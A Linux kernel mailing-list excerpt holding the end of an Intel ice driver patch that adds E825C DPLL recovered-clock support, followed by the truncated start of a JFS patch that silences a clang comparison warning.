ice_pf *pf, int start_idx, + const struct dpll_pin_ops *ops) +{ + struct ice_vsi *vsi = ice_get_main_vsi(pf); + int ret; + + ret = ice_dpll_init_pin_common(pf, &pf->dplls.rclk, start_idx, ops); + if (ret) + return ret; + + dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); + + return 0; +} + +static void +ice_dpll_deinit_fwnode_pin(struct ice_dpll_pin *pin) +{ + unregister_dpll_notifier(&pin->nb); + flush_workqueue(pin->pf->dplls.wq); + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; +} + +static void +ice_dpll_deinit_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + int i; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + destroy_workqueue(pf->dplls.wq); +} + /** * ice_dpll_deinit_pins - deinitialize direct pins * @pf: board private structure @@ -3113,6 +3417,8 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) struct ice_dpll *dp = &d->pps; ice_dpll_deinit_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); if (cgu) { ice_dpll_unregister_pins(dp->dpll, inputs, &ice_dpll_input_ops, num_inputs); @@ -3127,12 +3433,12 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) &ice_dpll_output_ops, num_outputs); ice_dpll_release_pins(outputs, num_outputs); if (!pf->dplls.generic) { - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, @@ -3141,6 +3447,141 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) } } +static struct fwnode_handle * +ice_dpll_pin_node_get(struct ice_pf *pf, const char *name) +{ + struct fwnode_handle *fwnode = dev_fwnode(ice_pf_to_dev(pf)); + int index; + + index = fwnode_property_match_string(fwnode, "dpll-pin-names", name); + if (index < 0) + return ERR_PTR(-ENOENT); + + return fwnode_find_reference(fwnode, "dpll-pins", index); +} + +static int +ice_dpll_init_fwnode_pin(struct ice_dpll_pin *pin, const char *name) +{ + struct ice_pf *pf = pin->pf; + int ret; + + pin->fwnode = ice_dpll_pin_node_get(pf, name); + if (IS_ERR(pin->fwnode)) { + dev_err(ice_pf_to_dev(pf), + "Failed to find %s firmware node: %pe\n", name, + pin->fwnode); + pin->fwnode = NULL; + return -ENODEV; + } + + dev_dbg(ice_pf_to_dev(pf), "Found fwnode node for %s\n", name); + + pin->pin = fwnode_dpll_pin_find(pin->fwnode, &pin->tracker); + if (IS_ERR_OR_NULL(pin->pin)) { + dev_info(ice_pf_to_dev(pf), + "DPLL pin for %pfwp not registered yet\n", + pin->fwnode); + pin->pin = NULL; + } + + pin->nb.notifier_call = ice_dpll_pin_notify; + ret = register_dpll_notifier(&pin->nb); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to subscribe for DPLL notifications\n"); + + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; + + return ret; + } + + return ret; +} + +/** + * ice_dpll_init_fwnode_pins - initialize pins from device tree + * @pf: board private structure + * @pins: pointer to pins array + * @start_idx: starting index for pins + * @count: number of pins to initialize + * + * Initialize input pins for E825 RCLK support. The parent pins (rclk0, rclk1) + * are expected to be defined by the system firmware (ACPI). This function + * allocates them in the dpll subsystem and stores their indices for later + * registration with the rclk pin. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int +ice_dpll_init_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + char pin_name[8]; + int i, ret; + + pf->dplls.wq = create_singlethread_workqueue("ice_dpll_wq"); + if (!pf->dplls.wq) + return -ENOMEM; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) { + pins[start_idx + i].pf = pf; + snprintf(pin_name, sizeof(pin_name), "rclk%u", i); + ret = ice_dpll_init_fwnode_pin(&pins[start_idx + i], pin_name); + if (ret) + goto error; + } + + return 0; +error: + while (i--) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + + destroy_workqueue(pf->dplls.wq); + + return ret; +} + +/** + * ice_dpll_init_pins_e825 - init pins and register pins with a dplls + * @pf: board private structure + * @cgu: if cgu is present and controlled by this NIC + * + * Initialize directly connected pf's pins within pf's dplls in a Linux dpll + * subsystem. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int ice_dpll_init_pins_e825(struct ice_pf *pf) +{ + int ret; + + ret = ice_dpll_init_fwnode_pins(pf, pf->dplls.inputs, 0); + if (ret) + return ret; + + ret = ice_dpll_init_rclk_pin(pf, DPLL_PIN_IDX_UNSPEC, + &ice_dpll_rclk_ops); + if (ret) { + /* Inform DPLL notifier works that DPLL init was finished + * unsuccessfully (ICE_DPLL_FLAG not set). + */ + complete_all(&pf->dplls.dpll_init); + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); + } + + return ret; +} + /** * ice_dpll_init_pins - init pins and register pins with a dplls * @pf: board private structure @@ -3155,21 +3596,24 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) */ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) { + const struct dpll_pin_ops *output_ops; + const struct dpll_pin_ops *input_ops; int ret, count; + input_ops = &ice_dpll_input_ops; + output_ops = &ice_dpll_output_ops; + ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.inputs, 0, - pf->dplls.num_inputs, - &ice_dpll_input_ops, - pf->dplls.eec.dpll, pf->dplls.pps.dpll); + pf->dplls.num_inputs, input_ops, + pf->dplls.eec.dpll, + pf->dplls.pps.dpll); if (ret) return ret; count = pf->dplls.num_inputs; if (cgu) { ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.outputs, - count, - pf->dplls.num_outputs, - &ice_dpll_output_ops, - pf->dplls.eec.dpll, + count, pf->dplls.num_outputs, + output_ops, pf->dplls.eec.dpll, pf->dplls.pps.dpll); if (ret) goto deinit_inputs; @@ -3205,30 +3649,30 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) } else { count += pf->dplls.num_outputs + 2 * ICE_DPLL_PIN_SW_NUM; } - ret = ice_dpll_init_rclk_pins(pf, &pf->dplls.rclk, count + pf->hw.pf_id, - &ice_dpll_rclk_ops); + + ret = ice_dpll_init_rclk_pin(pf, count + pf->ptp.port.port_num, + &ice_dpll_rclk_ops); if (ret) goto deinit_ufl; return 0; deinit_ufl: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_ufl_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_sma: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_sma_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_outputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.outputs, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.outputs, pf->dplls.num_outputs, - &ice_dpll_output_ops, pf->dplls.pps.dpll, + output_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); deinit_inputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.inputs, pf->dplls.num_inputs, - &ice_dpll_input_ops, pf->dplls.pps.dpll, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.inputs, + pf->dplls.num_inputs, + input_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); return ret; } @@ -3239,8 +3683,8 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) * @d: pointer to ice_dpll * @cgu: if cgu is present and controlled by this NIC * - * If cgu is owned unregister the dpll from dpll subsystem. - * Release resources of dpll device from dpll subsystem. + * If cgu is owned, unregister the DPL from DPLL subsystem. + * Release resources of DPLL device from DPLL subsystem. */ static void ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) @@ -3257,8 +3701,8 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) * @cgu: if cgu is present and controlled by this NIC * @type: type of dpll being initialized * - * Allocate dpll instance for this board in dpll subsystem, if cgu is controlled - * by this NIC, register dpll with the callback ops. + * Allocate DPLL instance for this board in dpll subsystem, if cgu is controlled + * by this NIC, register DPLL with the callback ops. * * Return: * * 0 - success @@ -3289,6 +3733,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { dpll_device_put(d->dpll, &d->tracker); + d->dpll = NULL; return ret; } d->ops = ops; @@ -3506,6 +3951,26 @@ ice_dpll_init_info_direct_pins(struct ice_pf *pf, return ret; } +/** + * ice_dpll_init_info_pin_on_pin_e825c - initializes rclk pin information + * @pf: board private structure + * + * Init information for rclk pin, cache them in pf->dplls.rclk. + * + * Return: + * * 0 - success + */ +static int ice_dpll_init_info_pin_on_pin_e825c(struct ice_pf *pf) +{ + struct ice_dpll_pin *rclk_pin = &pf->dplls.rclk; + + rclk_pin->prop.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + rclk_pin->prop.capabilities |= DPLL_PIN_CAPABILITIES_STATE_CAN_CHANGE; + rclk_pin->pf = pf; + + return 0; +} + /** * ice_dpll_init_info_rclk_pin - initializes rclk pin information * @pf: board private structure @@ -3632,7 +4097,10 @@ ice_dpll_init_pins_info(struct ice_pf *pf, enum ice_dpll_pin_type pin_type) case ICE_DPLL_PIN_TYPE_OUTPUT: return ice_dpll_init_info_direct_pins(pf, pin_type); case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - return ice_dpll_init_info_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + return ice_dpll_init_info_pin_on_pin_e825c(pf); + else + return ice_dpll_init_info_rclk_pin(pf); case ICE_DPLL_PIN_TYPE_SOFTWARE: return ice_dpll_init_info_sw_pins(pf); default: @@ -3654,6 +4122,50 @@ static void ice_dpll_deinit_info(struct ice_pf *pf) kfree(pf->dplls.pps.input_prio); } +/** + * ice_dpll_init_info_e825c - prepare pf's dpll information structure for e825c + * device + * @pf: board private structure + * + * Acquire (from HW) and set basic DPLL information (on pf->dplls struct). + * + * Return: + * * 0 - success + * * negative - init failure reason + */ +static int ice_dpll_init_info_e825c(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int ret = 0; + int i; + + d->clock_id = ice_generate_clock_id(pf); + d->num_inputs = ICE_SYNCE_CLK_NUM; + + d->inputs = kcalloc(d->num_inputs, sizeof(*d->inputs), GFP_KERNEL); + if (!d->inputs) + return -ENOMEM; + + ret = ice_get_cgu_rclk_pin_info(&pf->hw, &d->base_rclk_idx, + &pf->dplls.rclk.num_parents); + if (ret) + goto deinit_info; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + pf->dplls.rclk.parent_idx[i] = d->base_rclk_idx + i; + + ret = ice_dpll_init_pins_info(pf, ICE_DPLL_PIN_TYPE_RCLK_INPUT); + if (ret) + goto deinit_info; + dev_dbg(ice_pf_to_dev(pf), + "%s - success, inputs: %u, outputs: %u, rclk-parents: %u\n", + __func__, d->num_inputs, d->num_outputs, d->rclk.num_parents); + return 0; +deinit_info: + ice_dpll_deinit_info(pf); + return ret; +} + /** * ice_dpll_init_info - prepare pf's dpll information structure * @pf: board private structure @@ -3773,14 +4285,16 @@ void ice_dpll_deinit(struct ice_pf *pf) ice_dpll_deinit_worker(pf); ice_dpll_deinit_pins(pf, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.pps.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.eec.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); ice_dpll_deinit_info(pf); mutex_destroy(&pf->dplls.lock); } /** - * ice_dpll_init - initialize support for dpll subsystem + * ice_dpll_init_e825 - initialize support for dpll subsystem * @pf: board private structure * * Set up the device dplls, register them and pins connected within Linux dpll @@ -3789,7 +4303,43 @@ void ice_dpll_deinit(struct ice_pf *pf) * * Context: Initializes pf->dplls.lock mutex. */ -void ice_dpll_init(struct ice_pf *pf) +static void ice_dpll_init_e825(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int err; + + mutex_init(&d->lock); + init_completion(&d->dpll_init); + + err = ice_dpll_init_info_e825c(pf); + if (err) + goto err_exit; + err = ice_dpll_init_pins_e825(pf); + if (err) + goto deinit_info; + set_bit(ICE_FLAG_DPLL, pf->flags); + complete_all(&d->dpll_init); + + return; + +deinit_info: + ice_dpll_deinit_info(pf); +err_exit: + mutex_destroy(&d->lock); + dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); +} + +/** + * ice_dpll_init_e810 - initialize support for dpll subsystem + * @pf: board private structure + * + * Set up the device dplls, register them and pins connected within Linux dpll + * subsystem. Allow userspace to obtain state of DPLL and handling of DPLL + * configuration requests. + * + * Context: Initializes pf->dplls.lock mutex. + */ +static void ice_dpll_init_e810(struct ice_pf *pf) { bool cgu = ice_is_feature_supported(pf, ICE_F_CGU); struct ice_dplls *d = &pf->dplls; @@ -3829,3 +4379,15 @@ void ice_dpll_init(struct ice_pf *pf) mutex_destroy(&d->lock); dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); } + +void ice_dpll_init(struct ice_pf *pf) +{ + switch (pf->hw.mac_type) { + case ICE_MAC_GENERIC_3K_E825: + ice_dpll_init_e825(pf); + break; + default: + ice_dpll_init_e810(pf); + break; + } +} diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index 63fac6510df6e..ae42cdea0ee14 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -20,6 +20,12 @@ enum ice_dpll_pin_sw { ICE_DPLL_PIN_SW_NUM }; +struct ice_dpll_pin_work { + struct work_struct work; + unsigned long action; + struct ice_dpll_pin *pin; +}; + /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin @@ -39,6 +45,8 @@ struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; dpll_tracker tracker; + struct fwnode_handle *fwnode; + struct notifier_block nb; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -118,7 +126,9 @@ struct ice_dpll { struct ice_dplls { struct kthread_worker *kworker; struct kthread_delayed_work work; + struct workqueue_struct *wq; struct mutex lock; + struct completion dpll_init; struct ice_dpll eec; struct ice_dpll pps; struct ice_dpll_pin *inputs; @@ -147,3 +157,19 @@ static inline void ice_dpll_deinit(struct ice_pf *pf) { } #endif #endif + +#define ICE_CGU_R10 0x28 +#define ICE_CGU_R10_SYNCE_CLKO_SEL GENMASK(8, 5) +#define ICE_CGU_R10_SYNCE_CLKODIV_M1 GENMASK(13, 9) +#define ICE_CGU_R10_SYNCE_CLKODIV_LOAD BIT(14) +#define ICE_CGU_R10_SYNCE_DCK_RST BIT(15) +#define ICE_CGU_R10_SYNCE_ETHCLKO_SEL GENMASK(18, 16) +#define ICE_CGU_R10_SYNCE_ETHDIV_M1 GENMASK(23, 19) +#define ICE_CGU_R10_SYNCE_ETHDIV_LOAD BIT(24) +#define ICE_CGU_R10_SYNCE_DCK2_RST BIT(25) +#define ICE_CGU_R10_SYNCE_S_REF_CLK GENMASK(31, 27) + +#define ICE_CGU_R11 0x2C +#define ICE_CGU_R11_SYNCE_S_BYP_CLK GENMASK(6, 1) + +#define ICE_CGU_BYPASS_MUX_OFFSET_E825C 3 diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c index 2522ebdea9139..d921269e1fe71 100644 --- a/drivers/net/ethernet/intel/ice/ice_lib.c +++ b/drivers/net/ethernet/intel/ice/ice_lib.c @@ -3989,6 +3989,9 @@ void ice_init_feature_support(struct ice_pf *pf) break; } + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_set_feature_support(pf, ICE_F_PHY_RCLK); + if (pf->hw.mac_type == ICE_MAC_E830) { ice_set_feature_support(pf, ICE_F_MBX_LIMIT); ice_set_feature_support(pf, ICE_F_GCS); diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c index 4c8d20f2d2c0a..1d26be58e29a0 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp.c @@ -1341,6 +1341,38 @@ void ice_ptp_link_change(struct ice_pf *pf, bool linkup) if (pf->hw.reset_ongoing) return; + if (hw->mac_type == ICE_MAC_GENERIC_3K_E825) { + int pin, err; + + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; + + mutex_lock(&pf->dplls.lock); + for (pin = 0; pin < ICE_SYNCE_CLK_NUM; pin++) { + enum ice_synce_clk clk_pin; + bool active; + u8 port_num; + + port_num = ptp_port->port_num; + clk_pin = (enum ice_synce_clk)pin; + err = ice_tspll_bypass_mux_active_e825c(hw, + port_num, + &active, + clk_pin); + if (WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, clk_pin); + if (active && WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + } + mutex_unlock(&pf->dplls.lock); + } + switch (hw->mac_type) { case ICE_MAC_E810: case ICE_MAC_E830: diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c index 35680dbe4a7f7..61c0a0d93ea89 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c @@ -5903,7 +5903,14 @@ int ice_get_cgu_rclk_pin_info(struct ice_hw *hw, u8 *base_idx, u8 *pin_num) *base_idx = SI_REF1P; else ret = -ENODEV; - + break; + case ICE_DEV_ID_E825C_BACKPLANE: + case ICE_DEV_ID_E825C_QSFP: + case ICE_DEV_ID_E825C_SFP: + case ICE_DEV_ID_E825C_SGMII: + *pin_num = ICE_SYNCE_CLK_NUM; + *base_idx = 0; + ret = 0; break; default: ret = -ENODEV; diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.c b/drivers/net/ethernet/intel/ice/ice_tspll.c index 66320a4ab86fd..fd4b58eb9bc00 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.c +++ b/drivers/net/ethernet/intel/ice/ice_tspll.c @@ -624,3 +624,220 @@ int ice_tspll_init(struct ice_hw *hw) return err; } + +/** + * ice_tspll_bypass_mux_active_e825c - check if the given port is set active + * @hw: Pointer to the HW struct + * @port: Number of the port + * @active: Output flag showing if port is active + * @output: Output pin, we have two in E825C + * + * Check if given port is selected as recovered clock source for given output. + * + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output) +{ + u8 active_clk; + u32 val; + int err; + + switch (output) { + case ICE_SYNCE_CLK0: + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, val); + break; + case ICE_SYNCE_CLK1: + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, val); + break; + default: + return -EINVAL; + } + + if (active_clk == port % hw->ptp.ports_per_phy + + ICE_CGU_BYPASS_MUX_OFFSET_E825C) + *active = true; + else + *active = false; + + return 0; +} + +/** + * ice_tspll_cfg_bypass_mux_e825c - configure reference clock mux + * @hw: Pointer to the HW struct + * @ena: true to enable the reference, false if disable + * @port_num: Number of the port + * @output: Output pin, we have two in E825C + * + * Set reference clock source and output clock selection. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output) +{ + u8 first_mux; + int err; + u32 r10; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &r10); + if (err) + return err; + + if (!ena) + first_mux = ICE_CGU_NET_REF_CLK0; + else + first_mux = port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C; + + r10 &= ~(ICE_CGU_R10_SYNCE_DCK_RST | ICE_CGU_R10_SYNCE_DCK2_RST); + + switch (output) { + case ICE_SYNCE_CLK0: + r10 &= ~(ICE_CGU_R10_SYNCE_ETHCLKO_SEL | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD | + ICE_CGU_R10_SYNCE_S_REF_CLK); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_S_REF_CLK, first_mux); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHCLKO_SEL, + ICE_CGU_REF_CLK_BYP0_DIV); + break; + case ICE_SYNCE_CLK1: + { + u32 val; + + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + val &= ~ICE_CGU_R11_SYNCE_S_BYP_CLK; + val |= FIELD_PREP(ICE_CGU_R11_SYNCE_S_BYP_CLK, first_mux); + err = ice_write_cgu_reg(hw, ICE_CGU_R11, val); + if (err) + return err; + r10 &= ~(ICE_CGU_R10_SYNCE_CLKODIV_LOAD | + ICE_CGU_R10_SYNCE_CLKO_SEL); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKO_SEL, + ICE_CGU_REF_CLK_BYP1_DIV); + break; + } + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, r10); + if (err) + return err; + + return 0; +} + +/** + * ice_tspll_get_div_e825c - get the divider for the given speed + * @link_speed: link speed of the port + * @divider: output value, calculated divider + * + * Get CGU divider value based on the link speed. + * + * Return: + * * 0 - success + * * negative - error + */ +static int ice_tspll_get_div_e825c(u16 link_speed, unsigned int *divider) +{ + switch (link_speed) { + case ICE_AQ_LINK_SPEED_100GB: + case ICE_AQ_LINK_SPEED_50GB: + case ICE_AQ_LINK_SPEED_25GB: + *divider = 10; + break; + case ICE_AQ_LINK_SPEED_40GB: + case ICE_AQ_LINK_SPEED_10GB: + *divider = 4; + break; + case ICE_AQ_LINK_SPEED_5GB: + case ICE_AQ_LINK_SPEED_2500MB: + case ICE_AQ_LINK_SPEED_1000MB: + *divider = 2; + break; + case ICE_AQ_LINK_SPEED_100MB: + *divider = 1; + break; + default: + return -EOPNOTSUPP; + } + + return 0; +} + +/** + * ice_tspll_cfg_synce_ethdiv_e825c - set the divider on the mux + * @hw: Pointer to the HW struct + * @output: Output pin, we have two in E825C + * + * Set the correct CGU divider for RCLKA or RCLKB. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output) +{ + unsigned int divider; + u16 link_speed; + u32 val; + int err; + + link_speed = hw->port_info->phy.link_info.link_speed; + if (!link_speed) + return 0; + + err = ice_tspll_get_div_e825c(link_speed, &divider); + if (err) + return err; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + + /* programmable divider value (from 2 to 16) minus 1 for ETHCLKOUT */ + switch (output) { + case ICE_SYNCE_CLK0: + val &= ~(ICE_CGU_R10_SYNCE_ETHDIV_M1 | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHDIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_ETHDIV_LOAD; + break; + case ICE_SYNCE_CLK1: + val &= ~(ICE_CGU_R10_SYNCE_CLKODIV_M1 | + ICE_CGU_R10_SYNCE_CLKODIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKODIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_CLKODIV_LOAD; + break; + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + + return 0; +} diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.h b/drivers/net/ethernet/intel/ice/ice_tspll.h index c0b1232cc07c3..d650867004d1f 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.h +++ b/drivers/net/ethernet/intel/ice/ice_tspll.h @@ -21,11 +21,22 @@ struct ice_tspll_params_e82x { u32 frac_n_div; }; +#define ICE_CGU_NET_REF_CLK0 0x0 +#define ICE_CGU_REF_CLK_BYP0 0x5 +#define ICE_CGU_REF_CLK_BYP0_DIV 0x0 +#define ICE_CGU_REF_CLK_BYP1 0x4 +#define ICE_CGU_REF_CLK_BYP1_DIV 0x1 + #define ICE_TSPLL_CK_REFCLKFREQ_E825 0x1F #define ICE_TSPLL_NDIVRATIO_E825 5 #define ICE_TSPLL_FBDIV_INTGR_E825 256 int ice_tspll_cfg_pps_out_e825c(struct ice_hw *hw, bool enable); int ice_tspll_init(struct ice_hw *hw); - +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output); +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output); +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output); #endif /* _ICE_TSPLL_H_ */ diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h index 6a2ec8389a8f3..1e82f4c40b326 100644 --- a/drivers/net/ethernet/intel/ice/ice_type.h +++ b/drivers/net/ethernet/intel/ice/ice_type.h @@ -349,6 +349,12 @@ enum ice_clk_src { NUM_ICE_CLK_SRC }; +enum ice_synce_clk { + ICE_SYNCE_CLK0, + ICE_SYNCE_CLK1, + ICE_SYNCE_CLK_NUM +}; + struct ice_ts_func_info { /* Function specific info */ enum ice_tspll_freq time_ref; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:38 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH] jfs: avoid -Wtautological-constant-out-of-range-compare warning
From: Arnd Bergmann <arnd@arndb.de> A recent change for the range check started triggering a clang warning: fs/jfs/jfs_dtree.c:2906:31: error: result of comparison of constant 128 with expression of type 's8' (aka 'signed char') is always false [-Werror,-Wtautological-constant-out-of-range-compare] 2906 | if (stbl[i] < 0 || stbl[i] >= DTPAGEMAXSLOT) { | ~~~~~~~ ^ ~~~~~~~~~~~~~ fs/jfs/jfs_dtree.c:3111:30: error: result of comparison of constant 128 with expression of type 's8' (aka 'signed char') is always false [-Werror,-Wtautological-constant-out-of-range-compare] 3111 | if (stbl[0] < 0 || stbl[0] >= DTPAGEMAXSLOT) { | ~~~~~~~ ^ ~~~~~~~~~~~~~ Both the old and the new check were useless, but the previous version apparently did not lead to the warning. Rephrase this again by adding a cast. The check is still always false, but the compiler shuts up about it. Fixes: cafc6679824a ("jfs: replace hardcoded magic number with DTPAGEMAXSLOT constant") Signed-off-by: Arnd Bergmann <arnd@arndb.de> --- fs/jfs/jfs_dtree.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fs/jfs/jfs_dtree.c b/fs/jfs/jfs_dtree.c index 0ab83bb7bbdf..e3301e5fa037 100644 --- a/fs/jfs/jfs_dtree.c +++ b/fs/jfs/jfs_dtree.c @@ -2903,7 +2903,7 @@ int jfs_readdir(struct file *file, struct dir_context *ctx) stbl = DT_GETSTBL(p); for (i = index; i < p->header.nextindex; i++) { - if (stbl[i] < 0 || stbl[i] >= DTPAGEMAXSLOT) { + if (stbl[i] < 0 || (unsigned char)stbl[i] >= DTPAGEMAXSLOT) { jfs_err("JFS: Invalid stbl[%d] = %d for inode %ld, block = %lld", i, stbl[i], (long)ip->i_ino, (long long)bn); free_page(dirent_buf); @@ -3108,7 +3108,7 @@ static int dtReadFirst(struct inode *ip, struct btstack * btstack) /* get the leftmost entry */ stbl = DT_GETSTBL(p); - if (stbl[0] < 0 || stbl[0] >= 